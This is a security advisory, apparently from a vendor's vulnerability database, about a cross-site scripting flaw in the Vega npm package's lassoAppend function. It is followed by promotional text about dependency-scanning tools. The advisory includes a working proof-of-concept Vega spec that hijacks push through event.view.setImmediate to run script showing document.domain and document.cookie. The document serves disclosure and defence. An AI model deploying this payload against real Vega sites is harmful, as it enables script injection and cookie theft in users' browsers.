Vega has Cross-site Scripting vulnerability in `lassoAppend` function

Affecting vega package on npm

Context / Overview

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes push function on the 1st argument specifying array consisting of 2nd and 3rd arguments as push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument, push function can be set to any function that can be access via event.view (no all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceed minDist or its the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (depends on browser's non-built-in event.view.setImmediate function, feel free to replace with event.view.console.log or alike and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

Jit Recommended Tools

OSV-Scanner

Objective: Dependency check (SCA)

Description: OSV-Scanner provides an officially supported frontend to the OSV database that connects a project’s list of dependencies with the vulnerabilities that affect them. Since the OSV.dev database is open source and distributed, it has several benefits in comparison with closed source advisory databases and scanners:

Vulnerability Layer - SCA

SCA Dependency Check is one of the important tools used to identify vulnerabilities in open-source components used in software applications. However, it primarily focuses on identifying vulnerabilities in the dependency layer of the software application. In contrast, code vulnerability layer analysis is focused on identifying vulnerabilities in the source code of the application itself, rather than the dependencies it uses. It typically involves analyzing the source code to identify security issues such as buffer overflows, injection vulnerabilities, and authentication issues, among others. While SCA Dependency Check is an important tool in identifying vulnerabilities in open-source dependencies, it may not be sufficient to ensure the overall security of the software application. To ensure comprehensive security, it is important to also perform code vulnerability layer analysis to identify vulnerabilities in the source code of the application. Incorporating both SCA Dependency Check and code vulnerability layer analysis into the software development lifecycle can help ensure that vulnerabilities are identified and remediated at both the dependency and code layers of the application. This can help prevent security issues from being introduced into the final product and improve the overall security posture of the software application.

References & Sources

Similar Vulnerabilities

SOC 2 Type 2

Product

Security ToolsIntegrationsGitHub Marketplace Plan
SOC 2 Type 2

Company

About usCareersBlogEventsNews

Resources

Docs

Contact Us

Book a Demo
TwitterLinkedinFacebook

2023 © JIT | All rights Reserved |

Privacy Policy

| Terms of use

;